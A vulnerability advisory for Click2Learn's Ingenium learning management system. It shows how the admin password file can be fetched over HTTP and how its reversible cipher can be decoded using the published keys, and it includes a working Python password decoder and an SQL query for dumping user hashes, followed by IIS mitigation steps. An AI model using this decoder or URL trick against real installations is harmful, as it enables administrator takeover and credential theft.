This paper describes two vulnerabilities in Click2Learn's Ingenium Learning Management System. The first shows that the administrator password is available, effectively in the clear, by requesting a particular URL. The second shows that the "hashing" scheme applied to that password is a trivially reversible encoding and provides no real protection.
Credit:
The original advisory can be downloaded from:
http://netninja.com/papers/ingenium/advisory.txt
A Java implementation of the password decryption can be downloaded from:
http://netninja.com/papers/ingenium/IngeniumDecoder.java
The information has been provided by Brian Enigma.
Affected Systems:
Known to work on v5.1 and v6.1. It is likely that all versions are vulnerable. Click2Learn's Aspen LMS has not been tested.
All Ingenium installations visible to the public Internet should be examined immediately.
Administrator Password Hash Vulnerability:
Ingenium stores a number of configuration parameters in a Microsoft SQL database. It must also store a few values on the local system, because it needs several of them before it can reach the database at all--for instance, the location, login, and password for the database connection. This is, in effect, the database "bootstrap" information. In examining that file more closely (it is [install directory]/config/config.txt), Brian also noted that the application's administrator password, as a "hashed" value, is stored in the same file. Further inspection of the file location, directory structure, and IIS installation shows that the file lives in a folder under the htdocs web directory. This means a simple HTTP request can retrieve the configuration file.
In most default installations, replacing the "default.asp" file name in the URL of the Ingenium home page with "config/config.txt" will retrieve the file, administrator password hash included. This is just plain silly! Most web programmers with any amount of training or experience know that data must be stored out-of-band from the documents and programs the web server publishes: raw data files should never be web accessible.
While this particular vulnerability is a known issue (see Click2Learn's Knowledge Base article Q1254), it is brushed off as advice for the paranoid. Personal observation has not shown a single site that hides this configuration file. Utilizing this vulnerability leads us to the importance of the next one.
Administrator Password Hash Decryption:
You may or may not already know that the best way to store passwords in a persistent data store is with a one-way hash function; this is how UNIX systems have always stored theirs. You cannot recover a password from its hash without brute force--in most cases, so much number crunching that the process is not worth it. You may also know that one of the worst ways to store passwords (or any data) is with XOR "encryption": two large enough samples and a minute of math will give you a pretty good idea of what the key is. An even less secure method is the secret decoder ring. Most newspapers have a "Cryptogram" section with the Sunday comics that lets you solve these as a diversion. It is called a Caesar cipher, and it is made only mildly more annoying here by varying the offset with the position of the letter in the message (in other words, a Vigenère-style repeating-key shift).
Passwords are not case sensitive--it would appear they are converted to uppercase before being "encrypted." The example code will only decode letters and numbers, no special symbols, but the theory still applies.
In this particular cipher implementation, the key is:
9'$%100'%6
This key repeats if the plaintext is longer than ten characters. To decode a piece of ciphertext, take the byte value of each ciphertext character and subtract the byte value of the key character in the same position; the result is the plaintext byte. The value space wraps between 0x20 and 0x7D, which is 94 (0x5E) values: a difference that falls below 0x20 has 94 added back to it. In case you are not following, an example is in order. Say the password line in config.txt is "General\LocalAdmin=|smh|#'hp{9'$%10". The decoding goes like this:
cypher: |smh|#'hp{9'$%10
subtract key: 9'$%100'%69'$%10
You will note that only the first ten characters are significant. The rest are NULs in the plaintext, and NUL plus a key byte is just the key byte, so those ciphertext characters equal the key characters at the same positions. Worked out in hex, the first ten become:
cipher: 7c 73 6d 68 7c 23 27 68 70 7b
subtract key: 39 27 24 25 31 30 30 27 25 36
-----------------------------
equals: 43 4c 49 43 4b 51 55 41 4b 45
in ASCII: C L I C K Q U A K E
You will notice that the "Q" and "U" wrapped: "Q" (0x51) plus its key byte 0x30 is 0x81, above 0x7D, so it was stored as 0x23; subtracting the key during decoding gives -0x0D, which wraps back up by 94 to 0x51. Experimentation also shows that the numeric digits are somehow offset, such that zero (normally 0x30) decodes to lowercase n (0x6E). Symbols are also mapped into this area, but have not been completely explored.
User Password Hash Visibility:
This issue is not as severe as the administrator password, because you first need SELECT access to the database. A simple SELECT * FROM IWC_USR then gives you a list of logins and their corresponding password hashes. The hash uses the same algorithm as above; strip the "$" that begins each stored value and use a slightly different key, the eight characters "i0)'0+7/" repeated.
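The following Python decoder is an added example for both the administrator key and the IWC_USR key; it is not the vendor's code and not Brian Enigma's IngeniumDecoder.java. It implements exactly the subtraction-and-wrap described above and reproduces the advisory's worked example. Everything the advisory does not state is marked as an assumption in the code: that digits 1 to 9 follow '0' consecutively into 'o'..'w', that a zero difference marks the end of the password, the padding length used by encode(), the function names, and the sample config.txt body and IWC_USR row, which are constructed here (the admin value is the advisory's own example; the user value was produced with encode()).

```python
"""Decoder for the Ingenium LMS password encoding as the advisory describes it.

Added example, not the vendor's code nor Brian Enigma's IngeniumDecoder.java.
Anything not stated in the advisory is marked ASSUMPTION below.
"""
from typing import Optional

# Keys quoted in the advisory. Each repeats when the text is longer than the key.
ADMIN_KEY = b"9'$%100'%6"   # config.txt, General\LocalAdmin=... line
USER_KEY = b"i0)'0+7/"      # IWC_USR table, after dropping the leading "$"

LOW, HIGH = 0x20, 0x7D      # the value space the advisory says wraps
SPAN = HIGH - LOW + 1       # 94 values, so a wrapped byte is off by 0x5E


def decode(ciphertext: bytes, key: bytes) -> str:
    """Subtract the repeating key byte-wise, wrapping back into 0x20..0x7D."""
    plain = []
    for i, c in enumerate(ciphertext):
        p = c - key[i % len(key)]
        if p == 0:
            # NUL + key byte == key byte: the advisory's trailing padding.
            # ASSUMPTION: a zero difference always marks the end of the password.
            break
        if p < LOW:
            p += SPAN       # e.g. 'Q' and 'U' in the advisory's worked example
        ch = chr(p)
        # The advisory observes that '0' decodes to 'n' (0x6E).
        # ASSUMPTION: '1'..'9' follow consecutively as 'o'..'w'. Passwords are
        # uppercased before encoding, so a lowercase result cannot be a letter;
        # symbols also land in this area per the advisory and are not handled.
        if "n" <= ch <= "w":
            ch = chr(ord("0") + ord(ch) - ord("n"))
        plain.append(ch)
    return "".join(plain)


def encode(plaintext: str, key: bytes, total_len: int) -> bytes:
    """Inverse of decode() under the model above, for producing test vectors.

    ASSUMPTION: the product pads with NULs to some fixed length; the advisory's
    sample is 16 bytes for a 10-character password, so the caller supplies it.
    """
    out = bytearray()
    for i, ch in enumerate(plaintext.upper()):
        if ch.isdigit():
            ch = chr(ord("n") + ord(ch) - ord("0"))
        c = ord(ch) + key[i % len(key)]
        if c > HIGH:
            c -= SPAN
        out.append(c)
    while len(out) < total_len:
        out.append(key[len(out) % len(key)])   # NUL plaintext leaves the key byte
    return bytes(out)


def admin_password_from_config(config_text: str) -> Optional[str]:
    """Pull the LocalAdmin value out of a config.txt body and decode it."""
    for line in config_text.splitlines():
        if line.startswith("General\\LocalAdmin="):
            value = line.split("=", 1)[1]
            return decode(value.encode("ascii"), ADMIN_KEY)
    return None


def user_password(hash_field: str) -> str:
    """Decode one IWC_USR password field, which starts with '$' per the advisory."""
    if not hash_field.startswith("$"):
        raise ValueError("IWC_USR password fields begin with '$'")
    return decode(hash_field[1:].encode("ascii"), USER_KEY)


# Constructed sample config.txt body; the value is the advisory's own example.
SAMPLE_CONFIG = "General\\LocalAdmin=|smh|#'hp{9'$%10\n"

# Constructed IWC_USR row (login, password field). The field was produced with
# encode() above, so it demonstrates the model, not a real database value.
SAMPLE_USER_ROW = ("bob", "$M!k>0+7/")

if __name__ == "__main__":
    print(admin_password_from_config(SAMPLE_CONFIG))   # CLICKQUAKE
    print(user_password(SAMPLE_USER_ROW[1]))           # BOB7
```

Because the scheme is a byte-wise shift with a short fixed key, a single known plaintext/ciphertext pair (such as the one in the advisory) is enough to recover the whole key, which is why the worked example above doubles as the test vector here.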
Solution:
A good long-term solution would be a software update from Click2Learn that moves the files in the "config" directory (and possibly others) to a path outside of the web documents. This requires engineering time and QA resources, and the update may not reach entities that purchased the Ingenium LMS without a support contract.
A simple and immediate solution is to stop config.txt from being downloadable by configuring IIS to deny access to the directory. This is a simple operation. First, open the Internet Management console. Next, locate the "config" web folder. Right-click on it and select "Properties." Uncheck the "Read" and "Index" checkboxes and click "OK." Afterwards, confirm the fix from outside the server: requesting the config/config.txt URL described above should now return an IIS error page rather than the file.